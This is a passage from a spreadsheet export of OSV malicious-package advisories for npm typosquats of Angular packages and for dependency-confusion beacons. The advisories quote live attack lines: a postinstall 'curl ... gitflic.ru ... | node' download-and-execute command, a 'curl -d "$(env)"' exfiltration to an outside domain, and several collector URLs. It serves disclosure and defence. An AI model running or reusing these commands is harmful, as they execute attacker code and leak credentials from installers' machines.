      <c r="R190" s="5" t="inlineStr"/>
      <c r="S190" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (eefc706854c122c96c898da5d4db285f26e31430f25451e5d1073a31db5e5341)
Package @anfular/core@22.2.1 is a one-character typosquat of @angular/core, with manifest fields impersonating the official Angular package (scope @anfular, description 'Angular - the core framework', author 'angular', repository pointing at github.com/angular/angular). The package.json postinstall script runs 'curl -L https://web.archive.org/web/https://gitflic.ru/project/hellscripter/install-scripts/blob/raw?file=node.js | node', downloading an unpinned JavaScript payload from an attacker-controlled gitflic.ru URL (fronted by a web.archive.org wrapper) and piping it directly into node for execution on the installer's machine at npm install time. The fetched code is unverified, unpinned, hosted off any official registry or publisher-matched domain, and executed with the installer's privileges, giving the author arbitrary code execution on every machine that installs the package.
</t>
        </is>
      </c>
      <c r="T190" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17533</t>
        </is>
      </c>
    </row>
    <row r="191">
      <c r="A191" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B191" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C191" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17534</t>
        </is>
      </c>
      <c r="D191" s="5" t="inlineStr"/>
      <c r="E191" s="5" t="inlineStr"/>
      <c r="F191" s="5" t="inlineStr"/>
      <c r="G191" s="5" t="inlineStr"/>
      <c r="H191" s="5" t="inlineStr"/>
      <c r="I191" s="5" t="inlineStr"/>
      <c r="J191" s="5" t="inlineStr"/>
      <c r="K191" s="5" t="inlineStr"/>
      <c r="L191" s="5" t="inlineStr">
        <is>
          <t>npm:@angjlar/core</t>
        </is>
      </c>
      <c r="M191" s="5" t="inlineStr"/>
      <c r="N191" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O191" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P191" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q191" s="5" t="inlineStr"/>
      <c r="R191" s="5" t="inlineStr"/>
      <c r="S191" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (1dc3c51d631036eabc2b2933bcf3b7f2c08fe45d193136641e484456ba55a6d9)
Package @angjlar/core impersonates @angular/core: its package.json copies the real Angular project's description ('Angular - the core framework'), author ('angular'), and repository URL (github.com/angular/angular.git), while publishing under the lookalike scope @angjlar. The postinstall lifecycle script in package.json runs `curl -L https://web.archive.org/web/https://gitflic.ru/project/hellscripter/install-scripts/blob/raw?file=node.js |... node`, fetching unpinned, mutable JavaScript from a non-publisher host (gitflic.ru, proxied through web.archive.org) and piping it to the node interpreter. On `npm install`, this gives the operator of that remote script arbitrary code execution on the installer's machine. The package has no legitimate relationship to Angular; the impersonating metadata exists solely to lure developers who mistype @angular/core into installing the dropper.
</t>
        </is>
      </c>
      <c r="T191" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17534</t>
        </is>
      </c>
    </row>
    <row r="192">
      <c r="A192" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B192" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C192" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17535</t>
        </is>
      </c>
      <c r="D192" s="5" t="inlineStr"/>
      <c r="E192" s="5" t="inlineStr"/>
      <c r="F192" s="5" t="inlineStr"/>
      <c r="G192" s="5" t="inlineStr"/>
      <c r="H192" s="5" t="inlineStr"/>
      <c r="I192" s="5" t="inlineStr"/>
      <c r="J192" s="5" t="inlineStr"/>
      <c r="K192" s="5" t="inlineStr"/>
      <c r="L192" s="5" t="inlineStr">
        <is>
          <t>npm:@anguar/core</t>
        </is>
      </c>
      <c r="M192" s="5" t="inlineStr"/>
      <c r="N192" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O192" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P192" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q192" s="5" t="inlineStr"/>
      <c r="R192" s="5" t="inlineStr"/>
      <c r="S192" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (428f991afc1ada001d59a546b8290c039dc16c98f6e497346acd87b8c08034eb)
Package @anguar/core impersonates @angular/core: scope name differs by one letter and package.json name, description, author, and repository metadata are copied from the real @angular/core. The package.json declares a postinstall lifecycle hook that runs `curl -L https://web.archive.org/web/https://gitflic.ru/project/hellscripter/install-scripts/blob/raw?file=node.js | node`, fetching JavaScript from a gitflic.ru path under the user `hellscripter` (proxied through web.archive.org) and piping it into Node. The remote source is unpinned, unverified, hosted on infrastructure unrelated to the Angular project, and under full control of a third party. Any developer who mistypes the Angular scope and runs `npm install` will execute arbitrary attacker-controlled code on their machine.
</t>
        </is>
      </c>
      <c r="T192" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17535</t>
        </is>
      </c>
    </row>
    <row r="193">
      <c r="A193" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B193" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C193" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17536</t>
        </is>
      </c>
      <c r="D193" s="5" t="inlineStr"/>
      <c r="E193" s="5" t="inlineStr"/>
      <c r="F193" s="5" t="inlineStr"/>
      <c r="G193" s="5" t="inlineStr"/>
      <c r="H193" s="5" t="inlineStr"/>
      <c r="I193" s="5" t="inlineStr"/>
      <c r="J193" s="5" t="inlineStr"/>
      <c r="K193" s="5" t="inlineStr"/>
      <c r="L193" s="5" t="inlineStr">
        <is>
          <t>npm:@angulaar/cli</t>
        </is>
      </c>
      <c r="M193" s="5" t="inlineStr"/>
      <c r="N193" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O193" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P193" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q193" s="5" t="inlineStr"/>
      <c r="R193" s="5" t="inlineStr"/>
      <c r="S193" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (33d4a58c855f9b549d39f194483ee19730552bbb47a279f73237c8a403708d20)
Package name '@angulaar/cli' (double 'a') is a one-character edit of '@angular/cli'; README, LICENSE headers, and source files are copied verbatim from the real Angular CLI (Google LLC copyright, angular.dev license URLs, README pointing issues to github.com/angular/angular-cli). The manifest's dependencies list has been altered from the upstream package: real @angular/cli depends on '@modelcontextprotocol/sdk', while this package declares '@modelcontextprotocol/server': '2.0.0' and requires it from src/commands/mcp/cli.js and mcp-server.js. '@modelcontextprotocol/server' is not the official MCP package name, so npm install resolves and installs whatever bytes are published under that attacker-chosen name/version, executing any lifecycle scripts in that dependency on the installer's host and loading its code in-process on later `ng mcp` invocations. The lookalike package name, cloned source, and swapped MCP dependency together form a dependency-confusion delivery vector against developers who mistype the real @angular/cli name.
</t>
        </is>
      </c>
      <c r="T193" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17536</t>
        </is>
      </c>
    </row>
    <row r="194">
      <c r="A194" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B194" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C194" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17537</t>
        </is>
      </c>
      <c r="D194" s="5" t="inlineStr"/>
      <c r="E194" s="5" t="inlineStr"/>
      <c r="F194" s="5" t="inlineStr"/>
      <c r="G194" s="5" t="inlineStr"/>
      <c r="H194" s="5" t="inlineStr"/>
      <c r="I194" s="5" t="inlineStr"/>
      <c r="J194" s="5" t="inlineStr"/>
      <c r="K194" s="5" t="inlineStr"/>
      <c r="L194" s="5" t="inlineStr">
        <is>
          <t>npm:@angulaar/core</t>
        </is>
      </c>
      <c r="M194" s="5" t="inlineStr"/>
      <c r="N194" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O194" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P194" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q194" s="5" t="inlineStr"/>
      <c r="R194" s="5" t="inlineStr"/>
      <c r="S194" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (42861c7641349d2f58380e4f81b13ad9738dd254f224e9f7f239d9cf940cf792)
The package's package.json defines a postinstall lifecycle script that fetches a JavaScript file from a non-publisher host (gitflic.ru, proxied via web.archive.org, at the path /project/hellscripter/install-scripts/blob/raw?file=node.js) and pipes the response directly into node, executing arbitrary remote code on the installer's machine during npm install. The fetched code is unpinned, unverified, and controlled by a third-party account unrelated to the Angular project. The package name @angulaar/core resembles @angular/core, increasing the likelihood of accidental installation.
</t>
        </is>
      </c>
      <c r="T194" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17537</t>
        </is>
      </c>
    </row>
    <row r="195">
      <c r="A195" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B195" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C195" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17538</t>
        </is>
      </c>
      <c r="D195" s="5" t="inlineStr"/>
      <c r="E195" s="5" t="inlineStr"/>
      <c r="F195" s="5" t="inlineStr"/>
      <c r="G195" s="5" t="inlineStr"/>
      <c r="H195" s="5" t="inlineStr"/>
      <c r="I195" s="5" t="inlineStr"/>
      <c r="J195" s="5" t="inlineStr"/>
      <c r="K195" s="5" t="inlineStr"/>
      <c r="L195" s="5" t="inlineStr">
        <is>
          <t>npm:@angulr/core</t>
        </is>
      </c>
      <c r="M195" s="5" t="inlineStr"/>
      <c r="N195" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O195" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P195" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q195" s="5" t="inlineStr"/>
      <c r="R195" s="5" t="inlineStr"/>
      <c r="S195" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (c24dfd4b0a686b9056ff662e6fee53edfe23c7a94a5edf93fb4cace176216518)
The npm package `@angulr/core` masquerades as Angular's `@angular/core` by cloning its package.json metadata (description 'Angular - the core framework', author 'angular', repository angular/angular, ng-update packageGroup) while shipping a hostile `postinstall` script. The postinstall hook runs `curl -L https://web.archive.org/web/https://gitflic.ru/project/hellscripter/install-scripts/blob/raw?file=node.js |... node`, piping an unpinned, remotely fetched JavaScript payload directly into Node at install time. The destination is a personal `hellscripter` project on gitflic.ru fronted via web.archive.org, unrelated to Angular's publisher. Any developer running `npm install @angulr/core` executes attacker-controlled code with the installer's privileges, with no integrity check and no pinning.
</t>
        </is>
      </c>
      <c r="T195" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17538</t>
        </is>
      </c>
    </row>
    <row r="196">
      <c r="A196" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B196" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C196" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17539</t>
        </is>
      </c>
      <c r="D196" s="5" t="inlineStr"/>
      <c r="E196" s="5" t="inlineStr"/>
      <c r="F196" s="5" t="inlineStr"/>
      <c r="G196" s="5" t="inlineStr"/>
      <c r="H196" s="5" t="inlineStr"/>
      <c r="I196" s="5" t="inlineStr"/>
      <c r="J196" s="5" t="inlineStr"/>
      <c r="K196" s="5" t="inlineStr"/>
      <c r="L196" s="5" t="inlineStr">
        <is>
          <t>npm:@angupar/core</t>
        </is>
      </c>
      <c r="M196" s="5" t="inlineStr"/>
      <c r="N196" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O196" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P196" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q196" s="5" t="inlineStr"/>
      <c r="R196" s="5" t="inlineStr"/>
      <c r="S196" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (61d3f74118d7ca9e50d79028ad472e56f68c8f86111fb03973a0c01a00b4cd84)
Package impersonates @angular/core (name @angupar/core, author field "angular", repository pointing at github.com/angular/angular, README copied from Angular). Its package.json postinstall script runs `curl -L https://web.archive.org/web/https://gitflic.ru/project/hellscripter/install-scripts/blob/raw?file=node.js | node`, fetching JavaScript from a third-party user account (`hellscripter` on gitflic.ru) through a web.archive.org proxy and piping it directly to the installer's Node runtime. The fetch is unpinned, has no integrity check, and resolves to a host unrelated to the Angular project. `npm install @angupar/core` therefore yields arbitrary install-time code execution under attacker control, with the typosquat on @angular/core serving as the delivery lure.
</t>
        </is>
      </c>
      <c r="T196" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17539</t>
        </is>
      </c>
    </row>
    <row r="197">
      <c r="A197" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B197" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C197" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17540</t>
        </is>
      </c>
      <c r="D197" s="5" t="inlineStr"/>
      <c r="E197" s="5" t="inlineStr"/>
      <c r="F197" s="5" t="inlineStr"/>
      <c r="G197" s="5" t="inlineStr"/>
      <c r="H197" s="5" t="inlineStr"/>
      <c r="I197" s="5" t="inlineStr"/>
      <c r="J197" s="5" t="inlineStr"/>
      <c r="K197" s="5" t="inlineStr"/>
      <c r="L197" s="5" t="inlineStr">
        <is>
          <t>npm:@anngular/core</t>
        </is>
      </c>
      <c r="M197" s="5" t="inlineStr"/>
      <c r="N197" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O197" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P197" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q197" s="5" t="inlineStr"/>
      <c r="R197" s="5" t="inlineStr"/>
      <c r="S197" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (93d2078e85dc301d6b0299c93ff5e0e5e2c717290e88f18de85fce6554f2d027)
Package name @anngular/core (double-n) impersonates @angular/core, copying its description 'Angular - the core framework' and author 'angular'. package.json declares a postinstall lifecycle script: `curl -L https://web.archive.org/web/https://gitflic.ru/project/hellscripter/install-scripts/blob/raw?file=node.js | node`. On `npm install`, this unconditionally fetches an unpinned JavaScript payload from a non-publisher gitflic.ru repository (proxied through web.archive.org to evade host-based filtering) and pipes it directly into node, giving the operator of that gitflic.ru project arbitrary code execution on the installer's machine. The payload is not shipped with the package, is not integrity-pinned, and can be mutated at any time by whoever controls the gitflic.ru project.
</t>
        </is>
      </c>
      <c r="T197" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17540</t>
        </is>
      </c>
    </row>
    <row r="198">
      <c r="A198" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B198" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C198" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17541</t>
        </is>
      </c>
      <c r="D198" s="5" t="inlineStr"/>
      <c r="E198" s="5" t="inlineStr"/>
      <c r="F198" s="5" t="inlineStr"/>
      <c r="G198" s="5" t="inlineStr"/>
      <c r="H198" s="5" t="inlineStr"/>
      <c r="I198" s="5" t="inlineStr"/>
      <c r="J198" s="5" t="inlineStr"/>
      <c r="K198" s="5" t="inlineStr"/>
      <c r="L198" s="5" t="inlineStr">
        <is>
          <t>npm:@anuglar/core</t>
        </is>
      </c>
      <c r="M198" s="5" t="inlineStr"/>
      <c r="N198" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O198" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P198" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q198" s="5" t="inlineStr"/>
      <c r="R198" s="5" t="inlineStr"/>
      <c r="S198" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (5f23ef78cc88817166cff7f8fdf3f1839c610880d960d9394e286da232058f98)
Package name '@anuglar/core' is a one-character transposition of '@angular/core' and copies the legitimate package's description ('Angular - the core framework'), author ('angular'), and repository URL to impersonate it. The package.json postinstall lifecycle script runs `curl -L https://web.archive.org/web/https://gitflic.ru/project/hellscripter/install-scripts/blob/raw?file=node.js | node`, downloading arbitrary JavaScript from a third-party host (gitflic.ru, fetched via web.archive.org) and piping it directly into node for execution on `npm install`. The fetched code is unpinned, unhashed, and not shipped in the tarball, so its contents can change at any time and are executed with the privileges of the installing user. The script also references `ps` and `id` for host reconnaissance.
</t>
        </is>
      </c>
      <c r="T198" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17541</t>
        </is>
      </c>
    </row>
    <row r="199">
      <c r="A199" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B199" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C199" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17542</t>
        </is>
      </c>
      <c r="D199" s="5" t="inlineStr"/>
      <c r="E199" s="5" t="inlineStr"/>
      <c r="F199" s="5" t="inlineStr"/>
      <c r="G199" s="5" t="inlineStr"/>
      <c r="H199" s="5" t="inlineStr"/>
      <c r="I199" s="5" t="inlineStr"/>
      <c r="J199" s="5" t="inlineStr"/>
      <c r="K199" s="5" t="inlineStr"/>
      <c r="L199" s="5" t="inlineStr">
        <is>
          <t>npm:@inpeek/odata</t>
        </is>
      </c>
      <c r="M199" s="5" t="inlineStr"/>
      <c r="N199" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O199" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P199" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q199" s="5" t="inlineStr"/>
      <c r="R199" s="5" t="inlineStr"/>
      <c r="S199" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (dad085b4b3e089d6a6d4e6812c66a8b45f10d40bc4ab39ea7bd0ce850d17ed4b)
@inpeek/odata@99.99.100 is a dependency-confusion placeholder published to the public npm registry on the unregistered @inpeek scope with an inflated version (99.99.100) designed to outrank any internal release of the same name. The package.json declares a postinstall lifecycle hook that executes ping.js on `npm install`. ping.js performs an unconditional HTTPS GET to the hardcoded collector URL https://webhook.site/bec9d4b2-8f49-451e-84be-2681cb91ebf2, passing the installer's hostname (os.hostname()), platform (os.platform()), and Node.js version (process.version) as query parameters. index.js throws on require, so any accidental consumer breaks loudly after the postinstall beacon has already fired. The package self-labels as a bug-bounty research placeholder, but the install-time dataflow — automatic transmission of installer host identifiers to a third-party collector the installer did not opt into — is the dependency-confusion exploitation shape and reaches any installer whose tooling resolves @inpeek/* from the public registry.
</t>
        </is>
      </c>
      <c r="T199" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17542</t>
        </is>
      </c>
    </row>
    <row r="200">
      <c r="A200" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B200" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C200" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17543</t>
        </is>
      </c>
      <c r="D200" s="5" t="inlineStr"/>
      <c r="E200" s="5" t="inlineStr"/>
      <c r="F200" s="5" t="inlineStr"/>
      <c r="G200" s="5" t="inlineStr"/>
      <c r="H200" s="5" t="inlineStr"/>
      <c r="I200" s="5" t="inlineStr"/>
      <c r="J200" s="5" t="inlineStr"/>
      <c r="K200" s="5" t="inlineStr"/>
      <c r="L200" s="5" t="inlineStr">
        <is>
          <t>npm:@inpeek/odata-angular</t>
        </is>
      </c>
      <c r="M200" s="5" t="inlineStr"/>
      <c r="N200" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O200" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P200" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q200" s="5" t="inlineStr"/>
      <c r="R200" s="5" t="inlineStr"/>
      <c r="S200" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (914508dbfa95a3d2cef5aef321a656215797f477c161a8c234e76256db6cac65)
@inpeek/odata-angular@99.99.102 is a dependency-confusion squat on the private @inpeek scope, published to the public npm registry at an inflated version (99.99.102) to win resolution against an internal package of the same name. package.json declares scripts.postinstall as 'node./ping.js'; ping.js issues an HTTPS GET to the third-party collector https://db1b65hgnouukn3qov9gta83zgkdao9dy.oast.me/ carrying os.hostname(), os.platform(), process.version, and the package name as query parameters. index.js throws on require, so the package has no legitimate library function; the only install-time effect is the beacon to the external OAST domain. Any CI job or developer workstation whose resolver picks @inpeek/* from the public registry executes the beacon on npm install and leaks host identifiers to an attacker-controlled destination, regardless of a 'bug bounty research' framing in the description.
</t>
        </is>
      </c>
      <c r="T200" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17543</t>
        </is>
      </c>
    </row>
    <row r="201">
      <c r="A201" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B201" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C201" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17544</t>
        </is>
      </c>
      <c r="D201" s="5" t="inlineStr"/>
      <c r="E201" s="5" t="inlineStr"/>
      <c r="F201" s="5" t="inlineStr"/>
      <c r="G201" s="5" t="inlineStr"/>
      <c r="H201" s="5" t="inlineStr"/>
      <c r="I201" s="5" t="inlineStr"/>
      <c r="J201" s="5" t="inlineStr"/>
      <c r="K201" s="5" t="inlineStr"/>
      <c r="L201" s="5" t="inlineStr">
        <is>
          <t>npm:@qngular/core</t>
        </is>
      </c>
      <c r="M201" s="5" t="inlineStr"/>
      <c r="N201" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O201" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P201" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q201" s="5" t="inlineStr"/>
      <c r="R201" s="5" t="inlineStr"/>
      <c r="S201" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (e83437986b94381cddff72267bc53907d980e1b14dbfef9123aa47f5ed664664)
Package `@qngular/core` is a one-character typosquat of `@angular/core` and copies the real package's description, author, and repository metadata. The `postinstall` lifecycle script in package.json runs `curl -L https://web.archive.org/web/https://gitflic.ru/project/hellscripter/install-scripts/blob/raw?file=node.js | node`, fetching an opaque, non-publisher-controlled JavaScript payload from a third-party host (gitflic.ru via a web.archive.org proxy) and piping it unverified into `node`. This executes attacker-controlled code on the installer's machine during `npm install`.
</t>
        </is>
      </c>
      <c r="T201" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17544</t>
        </is>
      </c>
    </row>
    <row r="202">
      <c r="A202" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B202" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C202" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17545</t>
        </is>
      </c>
      <c r="D202" s="5" t="inlineStr"/>
      <c r="E202" s="5" t="inlineStr"/>
      <c r="F202" s="5" t="inlineStr"/>
      <c r="G202" s="5" t="inlineStr"/>
      <c r="H202" s="5" t="inlineStr"/>
      <c r="I202" s="5" t="inlineStr"/>
      <c r="J202" s="5" t="inlineStr"/>
      <c r="K202" s="5" t="inlineStr"/>
      <c r="L202" s="5" t="inlineStr">
        <is>
          <t>npm:abbishal-poc</t>
        </is>
      </c>
      <c r="M202" s="5" t="inlineStr"/>
      <c r="N202" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O202" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P202" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q202" s="5" t="inlineStr"/>
      <c r="R202" s="5" t="inlineStr"/>
      <c r="S202" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (f3d3f60fb75143a3cdfedea0c2f185e0556053cd458cd5e76cd5303bf406eb32)
On `npm install`, package.json's preinstall hook runs `sh./test.sh`, which uses character-split variable obfuscation (b=e, i=c, s=n, h=u, a=v, l=rl) to reconstruct and execute `curl -d "$(env)" https://abbishal.com/sh/poc`. The script dumps the installer's full process environment — which on CI/CD and developer hosts typically contains cloud credentials (AWS_*), publish tokens (NPM_TOKEN), source-control tokens (GITHUB_TOKEN) and other secrets — and POSTs the contents to the author-controlled domain abbishal.com. The destination is hardcoded and not caller-configurable. In-script comments explicitly describe evading npm's malware scanners, and the README's claims of 'no network requests' and 'no data collection' contradict the actual behavior.
</t>
        </is>
      </c>
      <c r="T202" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17545</t>
        </is>
      </c>
    </row>
    <row r="203">
      <c r="A203" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B203" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C203" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17546</t>
        </is>
      </c>
      <c r="D203" s="5" t="inlineStr"/>
      <c r="E203" s="5" t="inlineStr"/>
      <c r="F203" s="5" t="inlineStr"/>
      <c r="G203" s="5" t="inlineStr"/>
      <c r="H203" s="5" t="inlineStr"/>
      <c r="I203" s="5" t="inlineStr"/>
      <c r="J203" s="5" t="inlineStr"/>
      <c r="K203" s="5" t="inlineStr"/>
      <c r="L203" s="5" t="inlineStr">
        <is>
          <t>npm:aria-live-region-helper</t>
        </is>
      </c>
      <c r="M203" s="5" t="inlineStr"/>
      <c r="N203" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O203" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P203" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q203" s="5" t="inlineStr"/>
      <c r="R203" s="5" t="inlineStr"/>
      <c r="S203" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (391a9a163273e36e3945f918ea720b8e10aa462b0aa603d4012b28c557c58570)
The package is advertised as an ARIA accessibility helper but ships thunderboltRegistry.js, which executes a top-level IIFE on module load. The IIFE runs shell reconnaissance commands via child_process.execSync (whoami, id, pwd, ifconfig/ip addr, cat /etc/hosts, hostname) and sends their output, together with a beacon containing Node version, process.platform, and PID, via HTTP GET requests to the hardcoded endpoint http://dxpoc.gt.tc/callback.php/ef9ea0e191006f3cc6670720c99c26f3. The package also exports factories under names matching internal Wix thunderbolt registry entry points (thunderboltRegistry, siteAssetsRegistry, editorRegistry, corvidRegistry, etc.) and includes a registry-manifest.min.json mapping those names to parastorage.com unpkg URLs, so that a build pipeline resolving any of those registry names to this package triggers the recon-exfiltration side effect on import. Neither the reconnaissance behavior nor the dxpoc.gt.tc destination is related to the package's advertised accessibility purpose.
</t>
        </is>
      </c>
      <c r="T203" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17546</t>
        </is>
      </c>
    </row>
    <row r="204">
      <c r="A204" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
